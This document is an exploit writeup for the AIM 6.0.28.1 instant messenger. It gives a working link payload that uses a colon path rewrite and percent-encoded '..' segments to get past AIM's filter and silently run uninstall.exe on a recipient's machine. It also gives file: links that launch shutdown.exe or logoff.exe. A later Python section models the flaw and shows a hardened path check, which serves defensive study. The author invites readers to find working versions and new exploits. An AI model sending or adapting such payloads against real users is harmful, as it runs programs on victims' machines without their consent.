AIM 6.0.28.1 Uninstall Exploit
By exploiting how AIM 6.0 parses and runs links, you can force AIM to uninstall itself without a confirmation,
using a simple link.
AIM 6.0 does not stop links from launching local files. You could send
<a href="file:c:/windows/system32/shutdown.exe">click me</a> and as soon as they click it, shutdown.exe runs
(with no arguments it only prints its usage, but the point is that an arbitrary local executable is launched).
For this to work you need to know the drive and directory Windows is installed in,
so how would this be an exploit? Read on.
A Brief Description of How This Exploit Works:
When sending links, if you include a colon in the href, AIM automatically prefixes it with the file:/// path to its own
imApp/[version]/content/im directory.
Example:
Send:
<a href=":">a</a>
AIM Replaces This With:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
With AIM installed in a different directory:
<A title=: contentEditable=false href="file:///c:/aim6%20test/services/imApp/ver6_0_28_1/content/im/:" unselectable="on">a</A>
So, as you can see, a simple colon supplies the drive and the path of the im folder, with that colon tacked on the end.
You can add things after the colon to change the rest of the URL, so if you send
<a href=":/hey.html">a</a>
You Get:
<A title=: contentEditable=false href="file:///c:/program%20files/aim6/services/imApp/ver6_0_28_1/content/im/:/hey.html" unselectable="on">a</A>
So why not try directory traversal to run files, since the colon supplies the path we need?
Well, AOL thought of this and decided to filter it out, but I don't see why, since you could just use
file:c:/windows/system32/logoff.exe or a direct path to any other file you wanted to run, and that
won't get filtered.
Since /.. or even /. gets filtered out of our URLs, we have to use percent-encoded dots (%2E%2E) instead:
the filter only looks at the literal string and never decodes it before checking.
Proof of Concept:
This will uninstall AIM with one click of a link, without a confirmation and without having to know the install
drive or path, although in practice you are limited to running files in AIM's own install folders, since those
are the only locations whose position relative to the content/im directory you can predict.
This assumes that uninstall.exe is still in its normal place.
For me this is Drive:\main AIM directory\uninstall.exe. Send:
<a href=":/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe">click!</a>
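The following Python is an added example, not part of the original writeup and not AOL's code. It models the colon rewrite and the literal /.. filter the writeup describes, resolves the PoC href the way a file: URL loader would (percent-decode, then collapse dot segments), and shows the check AOL should have done instead: decode and normalise first, then confirm the result is still under content/im. The install root c:/program files/aim6 is taken from the rewritten link shown above; that hrefs which already start with a scheme (the file: examples) are left alone, that the filter matches the raw string, and that the trailing colon is treated as an ordinary path component are assumptions made for the model.

```python
import posixpath
import re
from urllib.parse import unquote

# Install root taken from the rewritten link in the writeup; any other root behaves the same.
INSTALL_ROOT = "c:/program%20files/aim6"
IM_CONTENT_DIR = INSTALL_ROOT + "/services/imApp/ver6_0_28_1/content/im"

# hrefs as they would be sent in an IM: the plain traversal and the percent-encoded PoC
PLAIN_TRAVERSAL = ":/../../../../../../uninstall.exe"
ENCODED_TRAVERSAL = ":/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/uninstall.exe"

# hrefs that already carry a scheme (file:, http:, ...) are assumed not to be rewritten,
# since the writeup's own file:c:/... links reach the target directly
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def aim_rewrite(href):
    """Model of the rewrite the writeup describes (assumption: reconstructed from the
    observed output, not AOL's code): an href containing a colon gets file:/// plus
    AIM's own content/im directory prepended, and the original href is tacked on."""
    if SCHEME_RE.match(href):
        return href
    if ":" in href:
        return "file:///" + IM_CONTENT_DIR + "/" + href
    return href


def naive_dot_filter(href):
    """The filter the writeup says AOL applied: reject the literal substrings '/..' and
    '/.' without decoding the href first (assumption: modelled on the described behaviour)."""
    return "/.." not in href and "/." not in href


def resolve_file_url(url):
    """What a file: URL loader does next: percent-decode, then collapse '.' and '..'
    segments (RFC 3986 remove_dot_segments). The trailing ':' is an ordinary path
    component here, so the first '..' only removes it. Returns a forward-slash path."""
    if not url.startswith("file:///"):
        raise ValueError("not a file:/// URL")
    path = unquote(url[len("file:///"):]).replace("\\", "/")
    # the leading '/' keeps '..' from climbing above the drive root; stripped again below
    return posixpath.normpath("/" + path)[1:]


def safe_resolve(href):
    """Hardened version: decode and normalise first, then require the result to stay
    inside the content/im directory. Returns the path to open, or None to refuse.
    Absolute file: links are refused outright. Windows paths are case-insensitive,
    so the containment check compares lower-cased strings."""
    url = aim_rewrite(href)
    if not url.startswith("file:///"):
        return None
    base = posixpath.normpath(unquote(IM_CONTENT_DIR)).lower()
    target = resolve_file_url(url)
    if target.lower() != base and not target.lower().startswith(base + "/"):
        return None
    return target


def demo():
    """Run both hrefs through the literal filter, the resolver and the hardened check."""
    out = {}
    for name, href in (("plain", PLAIN_TRAVERSAL), ("encoded", ENCODED_TRAVERSAL)):
        out[name] = {
            "passes_literal_filter": naive_dot_filter(href),
            "resolves_to": resolve_file_url(aim_rewrite(href)),
            "hardened_check": safe_resolve(href),
        }
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Both hrefs resolve to c:/program files/aim6/uninstall.exe; only the plain one trips the literal filter, which is the whole bug. The containment check has to run on exactly the form handed to the operating system: if the loader percent-decodes a second time, decode a second time before checking, otherwise %252E%252E gets through the same way %2E%2E does here.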
Anyone please post versions that work. It only works on the older beta version, AIM 6.0.28.1. If anyone finds AIM 7 like this, let me know; I am able to help and find an exploit for it.